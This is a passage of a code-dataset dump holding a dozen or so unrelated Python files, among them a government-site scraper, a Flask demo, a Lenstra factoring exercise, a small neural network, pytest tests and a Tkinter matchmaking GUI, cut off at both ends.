2]\n s = [1, 2, 3]\n r = sol.findContentChildren(g, s)\n print(r)","sub_path":"lc_455_assign_cookies.py","file_name":"lc_455_assign_cookies.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"36605876","text":"1 # coding: utf-8\n2 # Team : None\n3 # Author:zl\n4 # Date :2020/6/30 0030 下午 12:08\n5 # Tool :PyCharm\n\n\nimport requests\nimport re\nimport os\nimport csv\nimport random\nimport time\n\nheaders={\n'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n'Accept-Encoding':'gzip, deflate',\n'Accept-Language':'zh-CN,zh;q=0.9',\n'Connection':'keep-alive',\n# 'Host':'www.hbjc.gov.cn',\n'Referer':'http://www.hbjc.gov.cn/',\n'Upgrade-Insecure-Requests':'1',\n'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',\n}\n\ntable_names=['title','content','riqi','desc','url']\n\nprint('111')\n\ndef qu_html_lable(s):\n reg = re.compile(r'<[^>]+>', re.S)\n if isinstance(s, str):\n return reg.sub('', s)\n else:\n print('老兄,给字符串')\n return 0\n\ndef parse_index(link,desc):\n response=requests.get(link,headers=headers)\n\n text=response.text\n\n result=re.findall('''''',text,re.S)[0]\n\n result=re.findall('''
  • (.*?)\\[(.*?)\\]
  • ''',result,re.S)\n\n for url,title,riqi in result:\n if url in log:\n print('曾经已经下载,跳过')\n continue\n\n print(url)\n item = {}\n item['desc']=desc\n if '../.' in url:\n item['url']=url.replace('../../','http://www.hbjc.gov.cn/')\n else:\n item['url']=url.replace('./',desc)\n item['title']=title\n item['riqi']=riqi\n item['content']=get_content(item['url'])\n\n print(item)\n time.sleep(random.randint(1,3))\n write_csv(item)\n\n with open('./log.txt', 'a', encoding='utf-8') as f:\n f.write(url+'\\r\\n')\n\ndef get_content(page_url):\n\n print(page_url)\n response=requests.get(page_url,headers=headers)\n if 'www.spp.gov.cn/' in page_url:\n text=response.content.decode('utf-8')\n\n result=re.findall('

    (.*?)

    ',text,re.S)\n\n result = '.'.join(result)\n result=qu_html_lable(result)\n return(result)\n\n else:\n text=response.text\n result = re.findall(''' (.*?)''', text, re.S)[0]\n result = qu_html_lable(result)\n result = result.replace(' ', '').replace('\\u3000', '').replace('\\n', '').replace(' ','')\n return (result)\n\n\n\n\ndef write_csv(item):\n filename=item['desc'].split('/')[-2]\n if os.path.exists('./{}.txt'.format(filename)):\n with open('./{}.txt'.format(filename), 'a', newline='', encoding='utf-8-sig') as f:\n\n writer = csv.DictWriter(f, table_names)\n writer.writerow(item)\n f.flush()\n else:\n with open('./{}.txt'.format(filename), 'w', newline='', encoding='utf-8-sig') as f:\n # 标头在这里传入,作为第一行数据\n writer = csv.DictWriter(f, table_names)\n writer.writeheader()\n writer.writerow(item)\n f.flush()\n\n\n\n\n\n\najxx=['http://www.hbjc.gov.cn/qwfb/ajxx/'] #权威发布子版块案件信息索引页,共18页\nfor i in range(1,18):\n ajxx.append('http://www.hbjc.gov.cn/qwfb/ajxx/index_{}.shtml'.format(i))\n\nzdal=['http://www.hbjc.gov.cn/qwfb/zdal/',\n 'http://www.hbjc.gov.cn/qwfb/zdal/index_1.shtml'\n ] #权威发布子版块指导案例索引页,共2页\n\nndbg=['http://www.hbjc.gov.cn/gzbg/ndbg/',\n 'http://www.hbjc.gov.cn/gzbg/ndbg/index_1.shtml'\n ] #工作报告子版块年度报告索引页,共两页\n\nbnbg=['http://www.hbjc.gov.cn/gzbg/bnbg/'] #工作报告子版块半年报告索引页,一页\nztbg=['http://www.hbjc.gov.cn/gzbg/ztbg/']#工作报告子版块专题报告索引页,一页\n\n\nprint(ajxx)\nprint(zdal)\nprint(ndbg)\nprint(bnbg)\nprint(ztbg)\n\nlog=''\n\nif os.path.exists('./log.txt'):\n with open('./log.txt','r',encoding='utf-8') as f:\n log=f.read()\nelse:\n with open('./log.txt', 'w', encoding='utf-8') as f:\n f.write('')\n log=''\n\nfor i in bnbg:\n print('下载半年报告' + i)\n parse_index(i, desc='http://www.hbjc.gov.cn/gzbg/bnbg/')\n\nfor i in ztbg:\n print('下载工作报告' + i)\n parse_index(i, desc='http://www.hbjc.gov.cn/gzbg/ztbg/')\n\n\n\nfor i in zdal:\n print('下载指导案例' + i)\n parse_index(i,desc='http://www.hbjc.gov.cn/qwfb/zdal/')\n\n\n\nfor i in ndbg:\n print('下载年度报告' + i)\n parse_index(i, desc='http://www.hbjc.gov.cn/gzbg/ndbg/')\n\n\n\nfor i in ajxx:\n print('下载案件信息'+i)\n parse_index(i,desc='http://www.hbjc.gov.cn/qwfb/ajxx/')\n\n","sub_path":"湖北检察院.py","file_name":"湖北检察院.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"14507984","text":"#!/usr/bin/python\n\nimport os, math\nfrom flask import Flask, request, Response\nimport requests\nimport json\n\napp = Flask(__name__)\n\nPORT = 6000\n\n@app.route(\"/\")\ndef main():\n return \"Hellworld istio demo\"\n\n@app.route(\"/topstories\")\ndef topStories():\n url = 'https://hacker-news.firebaseio.com/v0/topstories.json?print=pretty'\n header = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\"\n }\n resp_data = requests.get(url, headers = header)\n if resp_data.ok:\n resp_json = resp_data.json()\n else:\n resp_json = { \"blocked\": \"true\" }\n\n resp_data = json.dumps(resp_json)\n return Response(resp_data , 200, content_type=\"application/json\")\n\n@app.route('/hello')\ndef hello():\n version = os.environ.get('SERVICE_VERSION')\n\n # do some cpu intensive computation\n x = 0.0001\n for i in range(0, 1000000):\n\t x = x + math.sqrt(x)\n\n return 'Hello version: %s, instance: %s\\n' % (version, os.environ.get('HOSTNAME'))\n\n@app.route('/health')\ndef health():\n return 'Helloworld is healthy', 200\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=PORT)\n","sub_path":"workshop03/warmup_exercise/istio/app-with-external-apicall/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"167982515","text":"# standart modules\nimport os\n\n# torch\nimport torch\nimport torchvision\nfrom torch import nn\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n# my libraries\nfrom not_functional.models.utils.BasicUtils import torch_image_to_numpy_image, rgb2gray\nfrom not_functional.models.utils.BasicUtils import data_getters\n\nmatplotlib.use('agg')\n\nclass matplotlib_visualization:\n def plot_loss(self, D_cost_train, D_wass_train, D_cost_valid, D_wass_valid,\n G_cost, save_path) -> None:\n \"\"\"\n Visualize Discriminators and Generator with respect to cost and Wasserstein(metric) loss using Matplotlib\n :param D_cost_train: Discriminators train cost\n :param D_wass_train: Discriminators train Wasserstein cost\n :param D_cost_valid: Discriminators validation cost\n :param D_wass_valid: Discriminators validation Wasserstein cost\n :param G_cost: Generator cost\n :param save_path: Image path. Save plot as image.\n :return: None\n \"\"\"\n assert len(D_cost_train) == len(D_wass_train) == len(D_cost_valid) == len(D_wass_valid) == len(G_cost)\n\n save_path = os.path.join(save_path, \"loss_curve.png\")\n\n x = range(len(D_cost_train))\n\n y1 = D_cost_train\n y2 = D_wass_train\n y3 = D_cost_valid\n y4 = D_wass_valid\n y5 = G_cost\n\n plt.plot(x, y1, label='D_loss_train')\n plt.plot(x, y2, label='D_wass_train')\n plt.plot(x, y3, label='D_loss_valid')\n plt.plot(x, y4, label='D_wass_valid')\n plt.plot(x, y5, label='G_loss')\n\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n\n plt.legend(loc=4)\n plt.grid(True)\n plt.tight_layout()\n\n plt.savefig(save_path)\n\n def plot_conv2d_weights(self, net):\n for i, module in enumerate(net.modules()):\n if isinstance(module, nn.Conv1d) or isinstance(module, nn.Conv2d):\n module_name = \"Conv\" + str(i)\n weights = module.weight\n weights = weights.reshape(-1).detach().cpu().numpy()\n print(\"{} bias: \".format(module_name), module.bias) # Bias to zero\n plt.hist(weights)\n plt.title(module_name)\n plt.show()\n\n ## inspect the data, parameters and NN(Neural Network)\n def imshow(self, img):\n img_shape = img.shape\n print(\"img_shape: {}\".format(img.shape))\n img = img / 2 + 0.5 # unnormalize\n trans_img = torch_image_to_numpy_image(img)\n print(\"img_shape: {}\".format(img.shape))\n plt.imshow(trans_img) # numpy and torch dimension orders are different so that need to change dims.\n # torch dim order: CHW(channel, height, width)\n plt.show()\n # print(\"image size: {}\".format( np.transpose(npimg, (1, 2, 0)).size ) )\n\n def inspect_data(self, loader: torch.utils.data.dataloader.DataLoader):\n # get some random training images\n loader_type = loader.dataset.train\n if loader_type:\n images, labels = data_getters.get_one_iter(self.trainloader)\n else:\n images, labels = data_getters.get_one_iter(self.testloader)\n # show images\n self.imshow(torchvision.utils.make_grid(images))\n # print labels\n print('classes: ', ''.join('%5s' % self.classes[labels[j]] for j in range(self.batch_size)))\n\n def inspect_one_data(self, images):\n image = images[0, ...]\n img = np.squeeze(image)\n img = torch_image_to_numpy_image(img) # PIL or numpy image format\n img = rgb2gray(img) # gray scale\n\n fig = plt.figure(figsize=(12, 12))\n ax = fig.add_subplot(111)\n ax.imshow(img, cmap='gray')\n width, height = img.shape\n thresh = img.max() / 2.5\n for x in range(width):\n for y in range(height):\n val = round(img[x][y], 2) if img[x][y] != 0 else 0\n ax.annotate(str(val), xy=(y, x),\n horizontalalignment='center',\n verticalalignment='center',\n color='white' if img[x][y] < thresh else 'black')\n plt.show()\n","sub_path":"not_functional/models/utils/visualization/matplotlib_visualization.py","file_name":"matplotlib_visualization.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"54521541","text":"# Copyright (c) 2014, Dignity Health\n#\n# Author: Ashley Anderson III \n# Date: 2016-01-25 09:50\n\nimport gpi\nimport numpy as np\nimport bart.python.cfl as cfl\nimport os\n\nclass ExternalNode(gpi.NodeAPI):\n \"\"\"Uses the numpy save interface for writing arrays.\n\n INPUT - numpy array to write\n\n WIDGETS:\n File Browser - button to launch file browser, and typein widget, to give pathname for output file\n Write Mode - write at any event, or write only with new filename\n Write Now - write right now\n \"\"\"\n\n def initUI(self):\n\n # Widgets\n self.addWidget(\n 'SaveFileBrowser', 'File Browser', button_title='Browse',\n caption='Save File (*.npy)', filter='cfl (*.cfl)')\n self.addWidget('PushButton', 'Write Mode', button_title='Write on New Filename', toggle=True)\n self.addWidget('PushButton', 'Write Now', button_title='Write Right Now', toggle=False)\n\n # IO Ports\n self.addInPort('in', 'NPYarray', dtype=np.complex64)\n\n # store for later use\n self.URI = gpi.TranslateFileURI\n\n def validate(self):\n\n if self.getVal('Write Mode'):\n self.setAttr('Write Mode', button_title=\"Write on Every Event\")\n else:\n self.setAttr('Write Mode', button_title=\"Write on New Filename\")\n\n fname = self.URI(self.getVal('File Browser'))\n self.setDetailLabel(fname)\n\n return 0\n\n def compute(self):\n\n if self.getVal('Write Mode') or self.getVal('Write Now') or ('File Browser' in self.widgetEvents()):\n\n fpath = self.URI(self.getVal('File Browser'))\n basedir, fname = os.path.split(fpath)\n basename, ext = os.path.splitext(fname)\n\n outpath = os.path.join(basedir, basename)\n\n data = self.getData('in')\n cfl.writecfl(outpath, data)\n\n return(0)\n","sub_path":"gpi/WriteCFL_GPI.py","file_name":"WriteCFL_GPI.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"459295161","text":"import pandas as pd\nimport time\nimport os.path\n#All of the files should be located in C:\\Users\\FIY716\\Documents\\Projects\\New_Column but below are the full paths for ease of use\n#C:\\Users\\FIY716\\Documents\\Projects\\New_Column\\Prod_Debt.xlsx\n#C:\\Users\\FIY716\\Documents\\Projects\\New_Column\\QA_Debt.xlsx\n#C:\\Users\\FIY716\\Documents\\Projects\\New_Column\\Prod_IP.xlsx\n#C:\\Users\\FIY716\\Documents\\Projects\\New_Column\\QA_IP.xlsx\nPROD_debt_file = input(\"Please enter the file path of the Prod Debt file you are looking to compare:\")\nQA_debt_file = input(\"Please enter the file path of the QA Debt file you are looking to compare:\")\nPROD_IP_file = input(\"Please enter the file path of the Prod IP file you are looking to compare:\")\nQA_IP_file = input(\"Please enter the file path of the QA IP file you are looking to compare:\")\n\nif os.path.isfile(PROD_debt_file) and os.path.isfile(QA_debt_file) and os.path.isfile(PROD_IP_file) and os.path.isfile(QA_IP_file):\n print(\"Thank you, please allow a few minutes for the process to complete :)\")\n\n start = time.time()\n\n df1 = pd.read_excel(PROD_debt_file, index_col=0)\n df2 = pd.read_excel(QA_debt_file, index_col=0)\n df3 = pd.read_excel(PROD_IP_file, index_col=0)\n df4 = pd.read_excel(QA_IP_file, index_col=0)\n\n#The indicator parameter below adds a new column to the merged data set notifying you of which data set the info is comign from\n df_new_ip = df3.merge(df4, on = 'TRD_ID', how='outer', indicator=True)\n df_new_debt = df1.merge(df2, on = 'TRD_ID', how='outer', indicator=True)\n#The new column is called \"_merge\"\n df_common_ip = df_new_ip[df_new_ip['_merge'] == 'both']\n df_common_debt = df_new_debt[df_new_debt['_merge'] == 'both']\n#The below now create variables from prod and qa without the common rows between them\n df_prod_debt = df1[(~df1.TRD_ID.isin(df_common_debt.TRD_ID))]\n df_qa_debt = df2[(~df2.TRD_ID.isin(df_common_debt.TRD_ID))]\n df_prod_ip = df3[(~df3.TRD_ID.isin(df_common_ip.TRD_ID))]\n df_qa_ip = df4[(~df4.TRD_ID.isin(df_common_ip.TRD_ID))]\n#Displays out the diffs between the two files dataframe(df_po)\n prod_debt = pd.DataFrame(df_prod_debt)\n qa_debt = pd.DataFrame(df_qa_debt)\n prod_ip = pd.DataFrame(df_prod_ip)\n qa_ip = pd.DataFrame(df_qa_ip)\n#Converting df to csv\n debt_prod_csv = prod_debt.to_csv(r\"C:/Users/FIY716/Documents/Projects/New_Column/Unique_Prod_Debt.csv\", index = None, header=True)\n debt_qa_csv = qa_debt.to_csv(r\"C:/Users/FIY716/Documents/Projects/New_Column/Unique_QA_Debt.csv\", index = None, header=True)\n ip_prod_csv = prod_ip.to_csv(r\"C:/Users/FIY716/Documents/Projects/New_Column/Unique_PROD_IP.csv\", index = None, header=True)\n ip_qa_csv = qa_ip.to_csv(r\"C:/Users/FIY716/Documents/Projects/New_Column/Unique_QA_IP.csv\", index = None, header=True)\n\n print(\"...............................\")\n print('It Took', round(time.time()-start,2), 'seconds for this script to run, thank you for your patience.')\nelse:\n print(\"You have not entered in an invalid file path, please try again.\")\n\n","sub_path":"File_Compare.py","file_name":"File_Compare.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"161120019","text":"\"\"\"\nCopyright 2021 AI Singapore\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n https://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\n\nimport numpy as np\n\nimport pytest\nfrom peekingduck.pipeline.nodes.input.recorded import Node\n\n\ndef create_reader():\n media_reader = Node({\"input\": \"source\",\n \"output\": \"img\",\n \"resize\": {\n \"do_resizing\": False,\n \"width\": 1280,\n \"height\": 720},\n \"mirror_image\": False,\n \"input_dir\": \".\"\n })\n return media_reader\n\n\ndef _get_video_file(reader, num_frames):\n \"\"\"Helper function to get an entire videofile\"\"\"\n video = []\n for _ in range(num_frames):\n output = reader.run({})\n video.append(output[\"img\"])\n return video\n\n\n@pytest.mark.usefixtures(\"tmp_dir\")\nclass TestMediaReader:\n\n def test_reader_run_throws_error_on_wrong_file_path(self):\n with pytest.raises(FileNotFoundError):\n file_path = 'path_that_does_not_exist'\n Node({\"input\": \"source\",\n \"output\": \"img\",\n \"resize\": {\n \"do_resizing\": False,\n \"width\": 1280,\n \"height\": 720},\n \"mirror_image\": False,\n \"input_dir\": file_path\n })\n\n def test_reader_run_throws_error_on_empty_folder(self):\n with pytest.raises(FileNotFoundError):\n reader = create_reader()\n reader.run({})\n\n def test_reader_reads_one_image(self, create_input_image):\n image1 = create_input_image(\"image1.png\", (900, 800, 3))\n reader = create_reader()\n output1 = reader.run({})\n assert np.array_equal(output1['img'], image1)\n\n def test_reader_reads_multi_images(self, create_input_image):\n image1 = create_input_image(\"image1.png\", (900, 800, 3))\n image2 = create_input_image(\"image2.png\", (900, 800, 3))\n image3 = create_input_image(\"image3.png\", (900, 800, 3))\n reader = create_reader()\n output1 = reader.run({})\n output2 = reader.run({})\n output3 = reader.run({})\n\n assert np.array_equal(output1['img'], image1)\n assert np.array_equal(output2['img'], image2)\n assert np.array_equal(output3['img'], image3)\n\n def test_reader_reads_one_video(self, create_input_video):\n num_frames = 30\n size = (600, 800, 3)\n video1 = create_input_video(\n \"video1.avi\", fps=10, size=size, nframes=num_frames\n )\n reader = create_reader()\n\n read_video1 = _get_video_file(reader, num_frames)\n assert np.array_equal(read_video1, video1)\n\n def test_reader_reads_multiple_videos(self, create_input_video):\n num_frames = 20\n size = (600, 800, 3)\n\n video1 = create_input_video(\n \"video1.avi\", fps=5, size=size, nframes=num_frames\n )\n video2 = create_input_video(\n \"video2.avi\", fps=5, size=size, nframes=num_frames\n )\n\n reader = create_reader()\n\n read_video1 = _get_video_file(reader, num_frames)\n assert np.array_equal(read_video1, video1)\n\n read_video2 = _get_video_file(reader, num_frames)\n assert np.array_equal(read_video2, video2)\n","sub_path":"tests/pipeline/nodes/input/test_recorded.py","file_name":"test_recorded.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"555370107","text":"def gcd(a,b):\n if b==0:\n return a\n else:\n return gcd(b,a%b)\n\ndef modInverse(a, m) :\n a = a % m;\n for x in range(1, m) :\n if (a * x) % m == 1:\n return x\n return 1\n\ndef find_lambda_of_one_point(x, y, a, n):\n top = 3 * x * x + a\n bot = 2 * y\n inv_bot = modInverse(bot, n)\n if inv_bot == 1:\n print(\"ANSWER: \", bot, gcd(bot, n))\n return (top * inv_bot) % n\n\ndef find_lambda_of_two_points(x1, y1, x2, y2, n):\n top = (y2 - y1)\n bot = (x2 - x1)\n inv_bot = modInverse(bot, n)\n if inv_bot == 1:\n print(\"ANSWER: \", bot, gcd(bot, n))\n return (top * inv_bot) % n\n\ndef find_x3_y3(lam, x1, x2, y1, n):\n x3 = (lam * lam - x1 - x2) % n\n y3 = (lam * (x1 - x3) - y1) % n\n return x3, y3\n\n\ndef fuck_471(x, y, a, n, iter):\n # y^2 = x^3 + Ax + B\n lam = find_lambda_of_one_point(x, y, a, n)\n new_x = find_x3_y3(lam, x, x, y, n)[0]\n new_y = find_x3_y3(lam, x, x, y, n)[1]\n\n #print(x, y, new_x, new_y)\n for i in range(2, iter):\n lam = find_lambda_of_two_points(x, y, new_x, new_y, n)\n new_y = find_x3_y3(lam, x, new_x, y, n)[1]\n new_x = find_x3_y3(lam, x, new_x, y, n)[0]\n\n print(new_x, new_y)\n\n\nif __name__ == '__main__':\n n = 73\n a = 8\n k = 11\n x = 32\n y = 53\n fuck_471(x, y, a, n, k)\n\n","sub_path":"tester/lenstra.py","file_name":"lenstra.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"486965080","text":"import numpy as np\n\n# 添加工具函数\ndef tanh(x):\n return np.tanh(x)\ndef tanh_deriv(x):\n return 1.0 - pow(tanh(x), 2)\ndef logistic(x):\n return 1/(1 + np.exp(-x))\ndef logistic_deriv(x):\n return logistic(x)*(1-logistic(x))\n\n# 神经网络主类\nclass NeuralNetwork:\n def __init__(self, layers, activation='tanh'):\n \"\"\"\n :param layers: 一个list,包含每层的单元数目,至少含有两个值\n :param activation: 一个str,指明使用哪个激活函数。可以是'logistic'或'tanh'\n \"\"\"\n # 选择激活函数\n if activation == 'logistic':\n self.activation = logistic\n self.activation_deriv = logistic_deriv\n elif activation == 'tanh': \n self.activation = tanh\n self.activation_deriv = tanh_deriv\n # 初始化权重容器,[-0.25,0.25]。?此处的处理有疑问\n self.weights = []\n for i in range(1, len(layers) - 1): # 除了输出层\n self.weights.append((2*np.random.random((layers[i - 1] + 1, layers[i] + 1)) - 1)*0.25) # layers[i-1]行,layers[i]列\n# self.weights.append((2*np.random.random((layers[i] + 1, layers[i + 1] + 1)) - 1)*0.25)\n self.weights.append((2*np.random.random((layers[len(layers) - 2] + 1, layers[len(layers) - 1])) - 1)*0.25)\n# print(self.weights, len(self.weights))\n def fit(self, X, y, learning_rate = 0.2, epochs = 10000): # X:行数是实例数,列数是维度\n \"\"\"\n :param learning_rate: 反向修正weights和bias时的系数\n :param epochs: 抽取X中的数据对神经网络进行更新,利用循环次数停止训练\n \"\"\"\n X = np.atleast_2d(X) # X化为numpy二维数据\n temp = np.ones([X.shape[0], X.shape[1] + 1]) # 初始化全1矩阵,多的列用来添加bias\n temp[:, 0:-1] = X # 在输入层添加bias\n X = temp\n y = np.array(y) # y化为numpy的array\n# print(X, '\\n', y)\n # 神经网络训练\n for k in range(epochs): # 共epochs次循环,每次从样本中随机抽样一个\n i = np.random.randint(X.shape[0]) # 随机取一行\n a = [X[i]]\n for l in range(len(self.weights)): # a[l]是在利用上一层计算下一层节点;这里把bias也融入到了weight中,仔细思考可以看明白\n# print(l, a[l])\n a.append(self.activation(np.dot(a[l], self.weights[l])))\n error = y[i] - a[-1]\n deltas = [error * self.activation_deriv(a[-1])] # 误差\n # 反向更新weights和bias\n for l in range(len(a) - 2, 0, -1):\n deltas.append(deltas[-1].dot(self.weights[l].T)*self.activation_deriv(a[l]))\n deltas.reverse()\n for i in range(len(self.weights)):\n layer = np.atleast_2d(a[i])\n delta = np.atleast_2d(deltas[i])\n self.weights[i] += learning_rate * layer.T.dot(delta)\n def predict(self, x):\n \"\"\"\n :param x: 用来测试的样本\n \"\"\"\n x = np.array(x)\n temp = np.ones(x.shape[0] + 1)\n temp[0:-1] = x\n a = temp\n for l in range(0, len(self.weights)):\n a = self.activation(np.dot(a, self.weights[l]))\n return a","sub_path":"HandwriteNum_OpenDataSet_NeuralNetwork/implement/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"182741254","text":"#!/usr/bin/python3\n\"\"\"Base Class\"\"\"\nimport json\n\n\nclass Base:\n \"\"\"Base Class\"\"\"\n\n __nb_objects = 0\n\n def __init__(self, id=None):\n \"\"\"Args:\n id\n \"\"\"\n\n if id is not None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\"Json to a string\"\"\"\n\n if list_dictionaries is None:\n return \"[]\"\n else:\n return(json.dumps(list_dictionaries))\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\"JSON write and save object to a file\"\"\"\n\n filename = cls.__name__ + '.json'\n data = []\n if list_objs is None:\n data = None\n else:\n for i in range(len(list_objs)):\n data.append(cls.to_dictionary(list_objs[i]))\n with open(filename, \"w\", encoding='utf-8') as f:\n f.write(cls.to_json_string(data))\n\n @staticmethod\n def from_json_string(json_string):\n \"\"\"Return JSON represenation\"\"\"\n nothing = []\n if json_string is None or len(json_string) == len(nothing):\n return []\n else:\n return(json.loads(json_string))\n\n @classmethod\n def create(cls, **dictionary):\n \"\"\"dummy class\"\"\"\n if cls.__name__ == 'Rectangle':\n dummy_class = cls(1, 1)\n dummy_class.update(**dictionary)\n else:\n if cls.__name__ == 'Square':\n dummy_class = cls(1)\n dummy_class.update(**dictionary)\n return dummy_class\n\n @classmethod\n def load_from_file(cls):\n new_list = []\n filename = cls.__name__ + \".json\"\n try:\n with open(filename, \"r\") as f:\n new_list = cls.from_json_string(f.read())\n for i, j in enumerate(new_list):\n new_list[i] = cls.create(**new_list[i])\n except:\n pass\n return new_list\n","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"609176364","text":"from tkinter import *\nfrom tkinter import ttk\nimport Match as Ma\nimport Team as Te\nimport Player as Pl\n\nprint(\"hi, this is Marissa :)\")\n\nclass GUI:\n\n def __init__(self, master): #-- magic funtion that builds GUI\n self.master = master\n master.title(\"Matchmaking GUI\")\n\n # -------------------------------------------------- FRAMES -------------------------------------------------\n self.button_frame = Frame(master) # - Frame BOTTOM\n self.button_frame.pack(side=BOTTOM, fill=X, padx=15)\n\n self.col0_frame = Frame(master) # - Frame 0\n self.col0_frame.pack(side=LEFT)\n\n self.playerq_frame = Frame(master) # - Frame 1\n self.playerq_frame.pack(side=LEFT)\n self.playerq_frame['borderwidth'] = 3\n self.playerq_frame['relief'] = 'sunken'\n\n self.col2_frame = Frame(master) # - Frame 2\n self.col2_frame.pack(side=LEFT)\n\n self.matchmaking_pr_frame = Frame(master) # - Frame 3\n self.matchmaking_pr_frame.pack(side=LEFT)\n self.matchmaking_pr_frame['borderwidth'] = 3\n self.matchmaking_pr_frame['relief'] = 'sunken'\n\n self.col4_frame = Frame(master) # - Frame 4\n self.col4_frame.pack(side=LEFT)\n\n self.finishmatch_frame = Frame(master) # - Frame 5\n self.finishmatch_frame.pack(side=LEFT)\n self.finishmatch_frame['borderwidth'] = 3\n self.finishmatch_frame['relief'] = 'sunken'\n\n self.col6_frame = Frame(master) # - Frame 6\n self.col6_frame.pack(side=LEFT)\n\n # -------------------------------------------------- FRAME 0 --------------------------------------------------\n self.spacing_col0 = Label(self.col0_frame, text=\" \") # - 3 spaces\n self.spacing_col0.config(height=2)\n self.spacing_col0.grid(row=0, column=0, sticky=W) # -- for spacing purposes\n # -------------------------------------------------- FRAME 1 --------------------------------------------------\n self.playerq_title = Label(self.playerq_frame, text=\"Player Queue\")\n self.playerq_title.grid(row=1, column=1, sticky=W)\n\n self.spacing_col1 = Label(self.playerq_frame, text=\"\\t\")\n self.spacing_col1.grid(row=2, column=1, sticky=W) # -- for spacing purposes\n\n self.playerq_box = Text(self.playerq_frame)\n self.playerq_box.config(height=36, width=25) # - this should have 'state=\"disabled\"'\n self.playerq_box.grid(row=3, column=1, sticky=W)\n # -------------------------------------------------- FRAME 2 --------------------------------------------------\n self.spacing_col2 = Label(self.col2_frame, text=\" \") # - 2 spaces\n self.spacing_col2.grid(row=0, column=2, sticky=W) # -- for spacing purposes\n # -------------------------------------------------- FRAME 3 --------------------------------------------------\n self.matchmaking_pr_title = Label(self.matchmaking_pr_frame, text=\"Matchmaking Process\")\n self.matchmaking_pr_title.grid(row=1, column=3, sticky=W)\n\n self.matches_option = ttk.Combobox(self.matchmaking_pr_frame, values=[\n \"Division1\",\n \"Division2\",\n \"Division3\",\n \"Division4\"])\n self.matches_option.grid(row=1, column=3, sticky=E)\n self.matches_option.current(0)\n\n self.spacing_col3 = Label(self.matchmaking_pr_frame, text=\"\\t\")\n self.spacing_col3.grid(row=2, column=3, sticky=W) # -- for spacing purposes\n\n self.matches_box = Text(self.matchmaking_pr_frame)\n self.matches_box.config(height=36, width=45, state=\"disabled\")\n self.matches_box.grid(row=3, column=3, sticky=N)\n # -------------------------------------------------- FRAME 4 --------------------------------------------------\n self.spacing_col4 = Label(self.col4_frame, text=\" \") # - 2 spaces\n self.spacing_col4.grid(row=0, column=4, sticky=W) # -- for spacing purposes\n # -------------------------------------------------- FRAME 5 --------------------------------------------------\n self.finishmatches_title = Label(self.finishmatch_frame, text=\"Finished Matches\")\n self.finishmatches_title.grid(row=1, column=5, sticky=W)\n\n self.finishmatches_option = ttk.Combobox(self.finishmatch_frame, values=[\n \"Division1\",\n \"Division2\",\n \"Division3\",\n \"Division4\"])\n self.finishmatches_option.grid(row=1, column=5, sticky=E)\n self.finishmatches_option.current(0)\n\n self.spacing_col5 = Label(self.finishmatch_frame, text=\"\\t\")\n self.spacing_col5.grid(row=2, column=5, sticky=W) # -- for spacing purposes\n\n self.finmatches_box = Text(self.finishmatch_frame)\n self.finmatches_box.config(height=36, width=45, state=\"disabled\")\n self.finmatches_box.grid(row=3, column=5, sticky=N)\n # -------------------------------------------------- FRAME 6 --------------------------------------------------\n self.spacing_col4 = Label(self.col6_frame, text=\" \") # - 2 spaces\n self.spacing_col4.grid(row=0, column=6, sticky=W) # -- for spacing purposes\n # -------------------------------------------------- FRAME BOTTOM --------------------------------------------------\n self.accept_p_button = Button(self.button_frame, text=\" ACCEPT PLAYERS \", command=self.accept_players())\n self.accept_p_button.grid(row=4, column=1, sticky=W)\n\n self.stop_p_button = Button(self.button_frame, text=\" STOP \")\n self.stop_p_button.grid(row=4, column=3, sticky=E, padx=80)\n\n\n def accept_players(self):\n tPlayer = Pl.Player(username=\"BOB\", summonerID=120385)\n print(tPlayer.username)\n\n self.playerq_box.insert(END, tPlayer.username + \" - \" + str(tPlayer.summonerID) + \"\\n\")\n\n\n def test(self): # - ?\n print(\"hi\")\n\nroot = 